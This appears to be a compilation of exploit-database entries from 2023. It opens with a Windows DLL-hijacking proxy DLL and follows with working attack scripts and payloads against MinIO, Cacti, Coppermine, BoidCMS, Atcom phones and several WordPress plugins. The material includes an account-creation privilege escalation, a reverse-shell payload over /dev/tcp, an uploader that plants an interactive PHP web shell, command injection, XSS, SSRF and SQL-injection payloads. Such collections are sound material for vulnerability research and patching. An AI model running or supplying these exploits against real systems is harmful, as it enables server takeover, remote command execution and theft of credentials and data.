HelpPane object allows us to force Windows 11 to DLL hijacking
Instructions:
1. Compile dll
2. Copy newly compiled dll "apds.dll" in the "C:\Windows\" directory
3. Launch cmd and Execute the following command to test HelpPane object "[System.Activator]::CreateInstance([Type]::GetTypeFromCLSID('8CEC58AE-07A1-11D9-B15E-000D56BFE6EE'))"
4. Boom DLL Hijacked!
------Code_Poc-------
#pragma once
#include <Windows.h>
// Function executed when the thread starts
extern "C" __declspec(dllexport)
DWORD WINAPI MessageBoxThread(LPVOID lpParam) {
MessageBox(NULL, L"DLL Hijacked!", L"DLL Hijacked!", NULL);
return 0;
}
PBYTE AllocateUsableMemory(PBYTE baseAddress, DWORD size, DWORD protection = PAGE_READWRITE) {
#ifdef _WIN64
PIMAGE_DOS_HEADER dosHeader = (PIMAGE_DOS_HEADER)baseAddress;
PIMAGE_NT_HEADERS ntHeaders = (PIMAGE_NT_HEADERS)((PBYTE)dosHeader + dosHeader->e_lfanew);
PIMAGE_OPTIONAL_HEADER optionalHeader = &ntHeaders->OptionalHeader;
// Create some breathing room
baseAddress = baseAddress + optionalHeader->SizeOfImage;
for (PBYTE offset = baseAddress; offset < baseAddress + MAXDWORD; offset += 1024 * 8) {
PBYTE usuable = (PBYTE)VirtualAlloc(
offset,
size,
MEM_RESERVE | MEM_COMMIT,
protection);
if (usuable) {
ZeroMemory(usuable, size); // Not sure if this is required
return usuable;
}
}
#else
// x86 doesn't matter where we allocate
PBYTE usuable = (PBYTE)VirtualAlloc(
NULL,
size,
MEM_RESERVE | MEM_COMMIT,
protection);
if (usuable) {
ZeroMemory(usuable, size);
return usuable;
}
#endif
return 0;
}
BOOL ProxyExports(HMODULE ourBase, HMODULE targetBase)
{
#ifdef _WIN64
BYTE jmpPrefix[] = { 0x48, 0xb8 }; // Mov Rax <Addr>
BYTE jmpSuffix[] = { 0xff, 0xe0 }; // Jmp Rax
#else
BYTE jmpPrefix[] = { 0xb8 }; // Mov Eax <Addr>
BYTE jmpSuffix[] = { 0xff, 0xe0 }; // Jmp Eax
#endif
PIMAGE_DOS_HEADER dosHeader = (PIMAGE_DOS_HEADER)targetBase;
PIMAGE_NT_HEADERS ntHeaders = (PIMAGE_NT_HEADERS)((PBYTE)dosHeader + dosHeader->e_lfanew);
PIMAGE_OPTIONAL_HEADER optionalHeader = &ntHeaders->OptionalHeader;
PIMAGE_DATA_DIRECTORY exportDataDirectory = &optionalHeader->DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT];
if (exportDataDirectory->Size == 0)
return FALSE; // Nothing to forward
PIMAGE_EXPORT_DIRECTORY targetExportDirectory = (PIMAGE_EXPORT_DIRECTORY)((PBYTE)dosHeader + exportDataDirectory->VirtualAddress);
if (targetExportDirectory->NumberOfFunctions != targetExportDirectory->NumberOfNames)
return FALSE; // TODO: Add support for DLLs with mixed ordinals
dosHeader = (PIMAGE_DOS_HEADER)ourBase;
ntHeaders = (PIMAGE_NT_HEADERS)((PBYTE)dosHeader + dosHeader->e_lfanew);
optionalHeader = &ntHeaders->OptionalHeader;
exportDataDirectory = &optionalHeader->DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT];
if (exportDataDirectory->Size == 0)
return FALSE; // Our DLL is broken
PIMAGE_EXPORT_DIRECTORY ourExportDirectory = (PIMAGE_EXPORT_DIRECTORY)((PBYTE)dosHeader + exportDataDirectory->VirtualAddress);
// ----------------------------------
// Make current header data RW for redirections
DWORD oldProtect = 0;
if (!VirtualProtect(
ourExportDirectory,
64, PAGE_READWRITE,
&oldProtect)) {
return FALSE;
}
DWORD totalAllocationSize = 0;
// Add the size of jumps
totalAllocationSize += targetExportDirectory->NumberOfFunctions * (sizeof(jmpPrefix) + sizeof(jmpSuffix) + sizeof(LPVOID));
// Add the size of function table
totalAllocationSize += targetExportDirectory->NumberOfFunctions * sizeof(INT);
// Add total size of names
PINT targetAddressOfNames = (PINT)((PBYTE)targetBase + targetExportDirectory->AddressOfNames);
for (DWORD i = 0; i < targetExportDirectory->NumberOfNames; i++)
totalAllocationSize += (DWORD)strlen(((LPCSTR)((PBYTE)targetBase + targetAddressOfNames[i]))) + 1;
// Add size of name table
totalAllocationSize += targetExportDirectory->NumberOfNames * sizeof(INT);
// Add the size of ordinals:
totalAllocationSize += targetExportDirectory->NumberOfFunctions * sizeof(USHORT);
// Allocate usuable memory for rebuilt export data
PBYTE exportData = AllocateUsableMemory((PBYTE)ourBase, totalAllocationSize, PAGE_READWRITE);
if (!exportData)
return FALSE;
PBYTE sideAllocation = exportData; // Used for VirtualProtect later
// Copy Function Table
PINT newFunctionTable = (PINT)exportData;
CopyMemory(newFunctionTable, (PBYTE)targetBase + targetExportDirectory->AddressOfNames, targetExportDirectory->NumberOfFunctions * sizeof(INT));
exportData += targetExportDirectory->NumberOfFunctions * sizeof(INT);
ourExportDirectory->AddressOfFunctions = (DWORD)((PBYTE)newFunctionTable - (PBYTE)ourBase);
// Write JMPs and update RVAs in the new function table
PINT targetAddressOfFunctions = (PINT)((PBYTE)targetBase + targetExportDirectory->AddressOfFunctions);
for (DWORD i = 0; i < targetExportDirectory->NumberOfFunctions; i++) {
newFunctionTable[i] = (DWORD)(exportData - (PBYTE)ourBase);
CopyMemory(exportData, jmpPrefix, sizeof(jmpPrefix));
exportData += sizeof(jmpPrefix);
PBYTE realAddress = (PBYTE)((PBYTE)targetBase + targetAddressOfFunctions[i]);
CopyMemory(exportData, &realAddress, sizeof(LPVOID));
exportData += sizeof(LPVOID);
CopyMemory(exportData, jmpSuffix, sizeof(jmpSuffix));
exportData += sizeof(jmpSuffix);
}
// Copy Name RVA Table
PINT newNameTable = (PINT)exportData;
CopyMemory(newNameTable, (PBYTE)targetBase + targetExportDirectory->AddressOfNames, targetExportDirectory->NumberOfNames * sizeof(DWORD));
exportData += targetExportDirectory->NumberOfNames * sizeof(DWORD);
ourExportDirectory->AddressOfNames = (DWORD)((PBYTE)newNameTable - (PBYTE)ourBase);
// Copy names and apply delta to all the RVAs in the new name table
for (DWORD i = 0; i < targetExportDirectory->NumberOfNames; i++) {
PBYTE realAddress = (PBYTE)((PBYTE)targetBase + targetAddressOfNames[i]);
DWORD length = (DWORD)strlen((LPCSTR)realAddress);
CopyMemory(exportData, realAddress, length);
newNameTable[i] = (DWORD)((PBYTE)exportData - (PBYTE)ourBase);
exportData += length + 1;
}
// Copy Ordinal Table
PINT newOrdinalTable = (PINT)exportData;
CopyMemory(newOrdinalTable, (PBYTE)targetBase + targetExportDirectory->AddressOfNameOrdinals, targetExportDirectory->NumberOfFunctions * sizeof(USHORT));
exportData += targetExportDirectory->NumberOfFunctions * sizeof(USHORT);
ourExportDirectory->AddressOfNameOrdinals = (DWORD)((PBYTE)newOrdinalTable - (PBYTE)ourBase);
// Set our counts straight
ourExportDirectory->NumberOfFunctions = targetExportDirectory->NumberOfFunctions;
ourExportDirectory->NumberOfNames = targetExportDirectory->NumberOfNames;
if (!VirtualProtect(
ourExportDirectory,
64, oldProtect,
&oldProtect)) {
return FALSE;
}
if (!VirtualProtect(
sideAllocation,
totalAllocationSize,
PAGE_EXECUTE_READ,
&oldProtect)) {
return FALSE;
}
return TRUE;
}
// Executed when the DLL is loaded (traditionally or through reflective injection)
BOOL APIENTRY DllMain(HMODULE hModule,
DWORD ul_reason_for_call,
LPVOID lpReserved
)
{
HMODULE realDLL;
switch (ul_reason_for_call)
{
case DLL_PROCESS_ATTACH:
CreateThread(NULL, NULL, MessageBoxThread, NULL, NULL, NULL);
realDLL = LoadLibrary(L"C:\\Windows\\System32\\apds.dll");
if (realDLL)
ProxyExports(hModule, realDLL);
case DLL_THREAD_ATTACH:
case DLL_THREAD_DETACH:
case DLL_PROCESS_DETACH:
break;
}
return TRUE;
}
--------------------------
# Exploit Title: Wordpress Plugin Masterstudy LMS - 3.0.17 - Unauthenticated Instructor Account Creation
# Google Dork: inurl:/user-public-account
# Date: 2023-09-04
# Exploit Author: Revan Arifio
# Vendor Homepage: https:/.org/plugins/masterstudy-lms-learning-management-system/
# Version: <= 3.0.17
# Tested on: Windows, Linux
# CVE : CVE-2023-4278
import requests
import os
import re
import time
banner = """
_______ ________ ___ ___ ___ ____ _ _ ___ ______ ___
/ ____\ \ / / ____| |__ \ / _ \__ \|___ \ | || |__ \____ / _ \
| | \ \ / /| |__ ______ ) | | | | ) | __) |_____| || |_ ) | / / (_) |
| | \ \/ / | __|______/ /| | | |/ / |__ <______|__ _/ / / / > _ <
| |____ \ / | |____ / /_| |_| / /_ ___) | | |/ /_ / / | (_) |
\_____| \/ |______| |____|\___/____|____/ |_|____/_/ \___/
======================================================================================================
|| Title : Masterstudy LMS <= 3.0.17 - Unauthenticated Instructor Account Creation ||
|| Author : https://github.com/revan-ar ||
|| Vendor Homepage : https:/wordpress.org/plugins/masterstudy-lms-learning-management-system/ ||
|| Support : https://www.buymeacoffee.com/revan.ar ||
======================================================================================================
"""
print(banner)
# get nonce
def get_nonce(target):
open_target = requests.get("{}/user-public-account".format(target))
search_nonce = re.search('"stm_lms_register":"(.*?)"', open_target.text)
if search_nonce[1] != None:
return search_nonce[1]
else:
print("Failed when getting Nonce :p")
# privielege escalation
def privesc(target, nonce, username, password, email):
req_data = {
"user_login":"{}".format(username),
"user_email":"{}".format(email),
"user_password":"{}".format(password),
"user_password_re":"{}".format(password),
"become_instructor":True,
"privacy_policy":True,
"degree":"",
"expertize":"",
"auditory":"",
"additional":[],
"additional_instructors":[],
"profile_default_fields_for_register":[],
"redirect_page":"{}/user-account/".format(target)
}
start = requests.post("{}/wp-admin/admin-ajax.php?action=stm_lms_register&nonce={}".format(target, nonce), json = req_data)
if start.status_code == 200:
print("[+] Exploit Success !!")
else:
print("[+] Exploit Failed :p")
# URL target
target = input("[+] URL Target: ")
print("[+] Starting Exploit")
plugin_check = requests.get("{}/wp-content/plugins/masterstudy-lms-learning-management-system/readme.txt".format(target))
plugin_version = re.search("Stable tag: (.+)", plugin_check.text)
int_version = plugin_version[1].replace(".", "")
time.sleep(1)
if int(int_version) < 3018:
print("[+] Target is Vulnerable !!")
# Credential
email = input("[+] Email: ")
username = input("[+] Username: ")
password = input("[+] Password: ")
time.sleep(1)
print("[+] Getting Nonce...")
get_nonce = get_nonce(target)
# Get Nonce
if get_nonce != None:
print("[+] Success Getting Nonce: {}".format(get_nonce))
time.sleep(1)
# Start PrivEsc
privesc(target, get_nonce, username, password, email)
# ----------------------------------
else:
print("[+] Target is NOT Vulnerable :p")
## Title: WEBIGniter v28.7.23 File Upload - Remote Code Execution
## Author: nu11secur1ty
## Date: 09/04/2023
## Vendor: https://webigniter.net/
## Software: https://webigniter.net/demo
## Reference: https://portswigger.net/web-security/file-upload
## Description:
The media function suffers from file upload vulnerability.
The attacker can upload and he can execute remotely very dangerous PHP
files, by using any created account before this on this system.
Then he can do very malicious stuff with the server of this application.
## Staus: HIGH-CRITICAL Vulnerability
[+]Simple Exploit:
```PHP
<?php
phpinfo();
?>
```
## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/WEBIGniter/2023/WEBIGniter-28.7.23-File-Upload-RCE)
## Proof and Exploit
[href](https://www.nu11secur1ty.com/2023/09/webigniter-28723-file-upload-rce.html)
## Time spent:
00:15:00
--
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/
https://cve.mitre.org/index.htmlhttps://cxsecurity.com/ and
https://www.exploit-db.com/
0day Exploit DataBase https://0day.today/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
nu11secur1ty <http://nu11secur1ty.com/>
# Exploit Title: Minio 2022-07-29T19-40-48Z - Path traversal
# Date: 2023-09-02
# Exploit Author: Jenson Zhao
# Vendor Homepage: https://min.io/
# Software Link: https://github.com/minio/minio/
# Version: Up to (excluding) 2022-07-29T19-40-48Z
# Tested on: Windows 10
# CVE : CVE-2022-35919
# Required before execution: pip install minio,requests
import urllib.parse
import requests, json, re, datetime, argparse
from minio.credentials import Credentials
from minio.signer import sign_v4_s3
class MyMinio():
secure = False
def __init__(self, base_url, access_key, secret_key):
self.credits = Credentials(
access_key=access_key,
secret_key=secret_key
)
if base_url.startswith('http://') and base_url.endswith('/'):
self.url = base_url + 'minio/admin/v3/update?updateURL=%2Fetc%2Fpasswd'
elif base_url.startswith('https://') and base_url.endswith('/'):
self.url = base_url + 'minio/admin/v3/update?updateURL=%2Fetc%2Fpasswd'
self.secure = True
else:
print('Please enter a URL address that starts with "http://" or "https://" and ends with "/"\n')
def poc(self):
datetimes = datetime.datetime.utcnow()
datetime_str = datetimes.strftime('%Y%m%dT%H%M%SZ')
urls = urllib.parse.urlparse(self.url)
headers = {
'X-Amz-Content-Sha256': 'e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855',
'X-Amz-Date': datetime_str,
'Host': urls.netloc,
}
headers = sign_v4_s3(
method='POST',
url=urls,
region='',
headers=headers,
credentials=self.credits,
content_sha256='e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855',
date=datetimes,
)
if self.secure:
response = requests.post(url=self.url, headers=headers, verify=False)
else:
response = requests.post(url=self.url, headers=headers)
try:
message = json.loads(response.text)['Message']
pattern = r'(\w+):(\w+):(\d+):(\d+):(\w+):(\/[\w\/\.-]+):(\/[\w\/\.-]+)'
matches = re.findall(pattern, message)
if matches:
print('There is CVE-2022-35919 problem with the url!')
print('The contents of the /etc/passwd file are as follows:')
for match in matches:
print("{}:{}:{}:{}:{}:{}:{}".format(match[0], match[1], match[2], match[3], match[4], match[5],
match[6]))
else:
print('There is no CVE-2022-35919 problem with the url!')
print('Here is the response message content:')
print(message)
except Exception as e:
print(
'It seems there was an issue with the requested response, which did not meet our expected criteria. Here is the response content:')
print(response.text)
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument("-u", "--url", required=True, help="URL of the target. example: http://192.168.1.1:9088/")
parser.add_argument("-a", "--accesskey", required=True, help="Minio AccessKey of the target. example: minioadmin")
parser.add_argument("-s", "--secretkey", required=True, help="Minio SecretKey of the target. example: minioadmin")
args = parser.parse_args()
minio = MyMinio(args.url, args.accesskey, args.secretkey)
minio.poc()
# Exploit Title: Media Library Assistant Wordpress Plugin - RCE and LFI
# Date: 2023/09/05
# CVE: CVE-2023-4634
# Exploit Author: Florent MONTEL / Patrowl.io / @Pepitoh / Twitter @Pepito_oh
# Exploitation path: https://patrowl.io/blog-wordpress-media-library-rce-cve-2023-4634/
# Exploit: https://github.com/Patrowl/CVE-2023-4634/
# Vendor Homepage: https://fr.wordpress.org/plugins/media-library-assistant/
# Software Link: https://fr.wordpress.org/plugins/media-library-assistant/
# Version: < 3.10
# Tested on: 3.09
# Description:
# Media Library Assistant Wordpress Plugin in version < 3.10 is affected by an unauthenticated remote reference to Imagick() conversion which allows attacker to perform LFI and RCE depending on the Imagick configuration on the remote server. The affected page is: wp-content/plugins/media-library-assistant/includes/mla-stream-image.php
#LFI
Steps to trigger conversion of a remote SVG
Create a remote FTP server at ftp://X.X.X.X:21 (http will not work, see references)
Host 2 files :
- malicious.svg
- malicious.svg[1]
Payload:
For LFI, getting wp-config.php:
Both malicious.svg and malicious.svg[1] on the remote FTP:
<svg width="500" height="500"
xmlns:xlink="http://www.w3.org/1999/xlink">
xmlns="http://www.w3.org/2000/svg">
<image xlink:href= "text:../../../../wp-config.php" width="500" height="500" />
</svg>
Then trigger conversion with:
http://127.0.0.1/wp-content/plugins/media-library-assistant/includes/mla-stream-image.php?mla_stream_file=ftp://X.X.X.X:21/malicious.svg&mla_debug=log&mla_stream_frame=1
# Directory listing or RCE:
To achieve Directory listing or even RCE, it is a little more complicated.
Use exploit available here:
https://github.com/Patrowl/CVE-2023-4634/
# Note
Exploitation will depend on the policy.xml Imagick configuration file installed on the remote server. All exploitation paths and scripts have been performed with a default wordpress configuration and installation (Wordpress has high chance to have the default Imagick configuration).
# Exploit Title: Cacti 1.2.24 - Authenticated command injection when using SNMP options
# Date: 2023-07-03
# Exploit Author: Antonio Francesco Sardella
# Vendor Homepage: https://www.cacti.net/
# Software Link: https://www.cacti.net/info/downloads
# Version: Cacti 1.2.24
# Tested on: Cacti 1.2.24 installed on 'php:7.4.33-apache' Docker container
# CVE: CVE-2023-39362
# Category: WebApps
# Original Security Advisory: https://github.com/Cacti/cacti/security/advisories/GHSA-g6ff-58cj-x3cp
# Example Vulnerable Application: https://github.com/m3ssap0/cacti-rce-snmp-options-vulnerable-application
# Vulnerability discovered and reported by: Antonio Francesco Sardella
=======================================================================================
Cacti 1.2.24 - Authenticated command injection when using SNMP options (CVE-2023-39362)
=======================================================================================
-----------------
Executive Summary
-----------------
In Cacti 1.2.24, under certain conditions, an authenticated privileged user, can use a malicious string in the SNMP options of a Device, performing command injection and obtaining remote code execution on the underlying server.
-------
Exploit
-------
Prerequisites:
- The attacker is authenticated.
- The privileges of the attacker allow to manage Devices and/or Graphs, e.g., "Sites/Devices/Data", "Graphs".
- A Device that supports SNMP can be used.
- Net-SNMP Graphs can be used.
- snmp module of PHP is not installed.
Example of an exploit:
- Go to "Console" > "Create" > "New Device".
- Create a Device that supports SNMP version 1 or 2.
- Ensure that the Device has Graphs with one or more templates of:
- "Net-SNMP - Combined SCSI Disk Bytes"
- "Net-SNMP - Combined SCSI Disk I/O"
- (Creating the Device from the template "Net-SNMP Device" will satisfy the Graphs prerequisite)
- In the "SNMP Options", for the "SNMP Community String" field, use a value like this:
public\' ; touch /tmp/m3ssap0 ; \'
- Click the "Create" button.
- Check under /tmp the presence of the created file.
To obtain a reverse shell, a payload like the following can be used.
public\' ; bash -c "exec bash -i &>/dev/tcp/<host>/<port> <&1" ; \'
A similar exploit can be used editing an existing Device, with the same prerequisites, and waiting for the poller to run. It could be necessary to change the content of the "Downed Device Detection" field under the "Availability/Reachability Options" section with an item that doesn't involve SNMP (because the malicious payload could break the interaction with the host).
----------
Root Cause
----------
A detailed root cause of the vulnerability is available in the original security advisory (https://github.com/Cacti/cacti/security/advisories/GHSA-g6ff-58cj-x3cp) or in my blog post (https://m3ssap0.github.io/articles/cacti_authenticated_command_injection_snmp.html).
----------
References
----------
- https://github.com/Cacti/cacti/security/advisories/GHSA-g6ff-58cj-x3cp
- https://m3ssap0.github.io/articles/cacti_authenticated_command_injection_snmp.html
- https://github.com/m3ssap0/cacti-rce-snmp-options-vulnerable-application
# Exploit Title: Wordpress Sonaar Music Plugin 4.7 - Stored XSS
# Date: 2023-09-05
# Exploit Author: Furkan Karaarslan
# Category : Webapps
# Vendor Homepage: http://127.0.0.1/wp/wordpress/wp-comments-post.php
# Version: 4.7 (REQUIRED)
# Tested on: Windows/Linux
----------------------------------------------------------------------------------------------------
1-First install sonar music plugin.
2-Then come to the playlist add page. > http://127.0.0.1/wp/wordpress/wp-admin/edit.php?post_type=sr_playlist
3-Press the Add new playlist button
4-Put a random title on the page that opens and publish the page. > http://127.0.0.1/wp/wordpress/wp-admin/post-new.php?post_type=sr_playlist
5-This is the published page http://127.0.0.1/wp/wordpress/album_slug/test/
6-Let's paste our xss payload in the comment section. Payload: <script>alert("XSS")</script>
Bingoo
Request:
POST /wp/wordpress/wp-comments-post.php HTTP/1.1
Host: 127.0.0.1
Content-Length: 155
Cache-Control: max-age=0
sec-ch-ua:
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: ""
Upgrade-Insecure-Requests: 1
Origin: http://127.0.0.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://127.0.0.1/wp/wordpress/album_slug/test/
Accept-Encoding: gzip, deflate
Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: comment_author_email_52c14530c1f3bbfa6d982f304802224a=a%40gmail.com; comment_author_52c14530c1f3bbfa6d982f304802224a=a%22%26gt%3Balert%28%29; wordpress_test_cookie=WP%20Cookie%20check; wordpress_logged_in_52c14530c1f3bbfa6d982f304802224a=hunter%7C1694109284%7CXGnjFgcc7FpgQkJrAwUv1kG8XaQu3RixUDyZJoRSB1W%7C16e2e3964e42d9e56edd7ab7e45b676094d0b9e0ab7fcec2e84549772e438ba9; wp-settings-time-1=1693936486
Connection: close
comment=%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E&submit=Yorum+g%C3%B6nder&comment_post_ID=13&comment_parent=0&_wp_unfiltered_html_comment=95f4bd9cf5
Exploit Title: coppermine-gallery 1.6.25 RCE
Application: coppermine-gallery
Version: v1.6.25
Bugs: RCE
Technology: PHP
Vendor URL: https://coppermine-gallery.net/
Software Link: https://github.com/coppermine-gallery/cpg1.6.x/archive/refs/tags/v1.6.25.zip
Date of found: 05.09.2023
Author: Mirabbas Ağalarov
Tested on: Linux
2. Technical Details & POC
========================================
steps
1.First of All create php file content as <?php echo system('cat /etc/passwd'); ?> and sequeze this file with zip.
$ cat >> test.php
<?php echo system('cat /etc/passwd'); ?>
$ zip test.zip test.php
1. Login to account
2. Go to http://localhost/cpg1.6.x-1.6.25/pluginmgr.php
3. Upload zip file
4. Visit to php file http://localhost/cpg1.6.x-1.6.25/plugins/test.php
poc request
POST /cpg1.6.x-1.6.25/pluginmgr.php?op=upload HTTP/1.1
Host: localhost
Content-Length: 630
Cache-Control: max-age=0
sec-ch-ua:
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: ""
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryi1AopwPnBYPdzorF
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost/cpg1.6.x-1.6.25/pluginmgr.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: cpg16x_data=YTo0OntzOjI6IklEIjtzOjMyOiI0MmE1Njk2NzhhOWE3YTU3ZTI2ZDgwYThlYjZkODQ4ZCI7czoyOiJhbSI7aToxO3M6NDoibGFuZyI7czo3OiJlbmdsaXNoIjtzOjM6ImxpdiI7YTowOnt9fQ%3D%3D; cpg16x_fav=YToxOntpOjA7aToxO30%3D; d4e0836e1827aa38008bc6feddf97eb4=93ffa260bd94973848c10e15e50b342c
Connection: close
------WebKitFormBoundaryi1AopwPnBYPdzorF
Content-Disposition: form-data; name="plugin"; filename="test.zip"
Content-Type: application/zip
PK
�����b%Wz½µ}(���(�����test.phpUT �ñòödÓòödux���������<?php echo system('cat /etc/passwd');?>
PK
�����b%Wz½µ}(���(������������¤����test.phpUT�ñòödux���������PK������N���j�����
------WebKitFormBoundaryi1AopwPnBYPdzorF
Content-Disposition: form-data; name="form_token"
50982f2e64a7bfa63dbd912a7fdb4e1e
------WebKitFormBoundaryi1AopwPnBYPdzorF
Content-Disposition: form-data; name="timestamp"
1693905214
------WebKitFormBoundaryi1AopwPnBYPdzorF--
Exploit Title: Webedition CMS v2.9.8.8 - Blind SSRF
Application: Webedition CMS
Version: v2.9.8.8
Bugs: Blind SSRF
Technology: PHP
Vendor URL: https://www.webedition.org/
Software Link: https://download.webedition.org/releases/OnlineInstaller.tgz?p=1
Date of found: 07.09.2023
Author: Mirabbas Ağalarov
Tested on: Linux
2. Technical Details & POC
========================================
write https://youserver/test.xml to we_cmd[0] parameter
poc request
POST /webEdition/rpc.php?cmd=widgetGetRss&mod=rss HTTP/1.1
Host: localhost
Content-Length: 141
sec-ch-ua:
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36
sec-ch-ua-platform: ""
Origin: http://localhost
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost/webEdition/index.php?we_cmd[0]=startWE
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: treewidth_main=300; WESESSION=41a9164e60666254199b3ea1cd3d2e0ad969c379; cookie=yep; treewidth_main=300
Connection: close
we_cmd[0]=https://YOU-SERVER/test.xml&we_cmd[1]=111000&we_cmd[2]=0&we_cmd[3]=110000&we_cmd[4]=&we_cmd[5]=m_3
#!/usr/bin/python3
# Exploit Title: BoidCMS v2.0.0 - authenticated file upload vulnerability
# Date: 08/21/2023
# Exploit Author: 1337kid
# Vendor Homepage: https://boidcms.github.io/#/
# Software Link: https://boidcms.github.io/BoidCMS.zip
# Version: <= 2.0.0
# Tested on: Ubuntu
# CVE : CVE-2023-38836
import requests
import re
import argparse
parser = argparse.ArgumentParser(description='Exploit for CVE-2023-38836')
parser.add_argument("-u", "--url", help="website url")
parser.add_argument("-l", "--user", help="admin username")
parser.add_argument("-p", "--passwd", help="admin password")
args = parser.parse_args()
base_url=args.url
user=args.user
passwd=args.passwd
def showhelp():
print(parser.print_help())
exit()
if base_url == None: showhelp()
elif user == None: showhelp()
elif passwd == None: showhelp()
with requests.Session() as s:
req=s.get(f'{base_url}/admin')
token=re.findall('[a-z0-9]{64}',req.text)
form_login_data={
"username":user,
"password":passwd,
"login":"Login",
}
form_login_data['token']=token
s.post(f'{base_url}/admin',data=form_login_data)
#=========== File upload to RCE
req=s.get(f'{base_url}/admin?page=media')
token=re.findall('[a-z0-9]{64}',req.text)
form_upld_data={
"token":token,
"upload":"Upload"
}
#==== php shell
php_code=['GIF89a;\n','<?php system($_GET["cmd"]) ?>']
with open('shell.php','w') as f:
f.writelines(php_code)
#====
file = {'file' : open('shell.php','rb')}
s.post(f'{base_url}/admin?page=media',files=file,data=form_upld_data)
req=s.get(f'{base_url}/media/shell.php')
if req.status_code == '404':
print("Upload failed")
exit()
print(f'Shell uploaded to "{base_url}/media/shell.php"')
while 1:
cmd=input("cmd >> ")
if cmd=='exit': exit()
req=s.get(f'{base_url}/media/shell.php',params = {"cmd": cmd})
print(req.text)
# Exploit Title: Atcom 2.7.x.x - Authenticated Command Injection
# Google Dork: N/A
# Date: 07/09/2023
# Exploit Author: Mohammed Adel
# Vendor Homepage: https://www.atcom.cn/
# Software Link:
https://www.atcom.cn/html/yingwenban/Product/Fast_IP_phone/2017/1023/135.html
# Version: All versions above 2.7.x.x
# Tested on: Kali Linux
Exploit Request:
POST /cgi-bin/web_cgi_main.cgi?user_get_phone_ping HTTP/1.1
Host: {TARGET_IP}
User-Agent: polar
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 49
Authorization: Digest username="admin", realm="IP Phone Web
Configuration", nonce="value_here",
uri="/cgi-bin/web_cgi_main.cgi?user_get_phone_ping",
response="value_here", qop=auth, nc=value_here, cnonce="value_here"
cmd=0.0.0.0$(pwd)&ipv4_ipv6=0&user_get_phone_ping
Response:
{"ping_cmd_result":"cGluZzogYmFkIGFkZHJlc3MgJzAuMC4wLjAvdXNyL2xvY2FsL2FwcC9saWdodHRwZC93d3cvY2dpLWJpbicK","ping_cmd":"0.0.0.0$(pwd)"}
The value of "ping_cmd_result" is encoded as base64. Decoding the
value of "ping_cmd_result" reveals the result of the command executed
as shown below:
ping: bad address '0.0.0.0/usr/local/app/lighttpd/www/cgi-bin'
## Title: Shuttle-Booking-Software v1.0 - Multiple-SQLi
## Author: nu11secur1ty
## Date: 09/10/2023
## Vendor: https://www.phpjabbers.com/
## Software: https://www.phpjabbers.com/shuttle-booking-software/#sectionPricing
## Reference: https://portswigger.net/web-security/sql-injection
## Description:
The location_id parameter appears to be vulnerable to SQL injection
attacks. A single quote was submitted in the location_id parameter,
and a database error message was returned. Two single quotes were then
submitted and the error message disappeared.
The attacker easily can steal all information from the database of
this web application!
WARNING! All of you: Be careful what you buy! This will be your responsibility!
STATUS: HIGH-CRITICAL Vulnerability
[+]Payload:
```mysql
---
Parameter: location_id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: controller=pjFrontPublic&action=pjActionGetDropoffs&index=348&location_id=3''')
AND 1347=1347 AND ('MVss'='MVss&traveling=from
Type: error-based
Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or
GROUP BY clause (GTID_SUBSET)
Payload: controller=pjFrontPublic&action=pjActionGetDropoffs&index=348&location_id=3''')
AND GTID_SUBSET(CONCAT(0x716b786a71,(SELECT
(ELT(9416=9416,1))),0x71706b7071),9416) AND
('dOqc'='dOqc&traveling=from
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: controller=pjFrontPublic&action=pjActionGetDropoffs&index=348&location_id=3''')
AND (SELECT 1087 FROM (SELECT(SLEEP(15)))poqp) AND
('EEYQ'='EEYQ&traveling=from
---
```
## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/phpjabbers/2023/Shuttle-Booking-Software-1.0)
## Proof and Exploit:
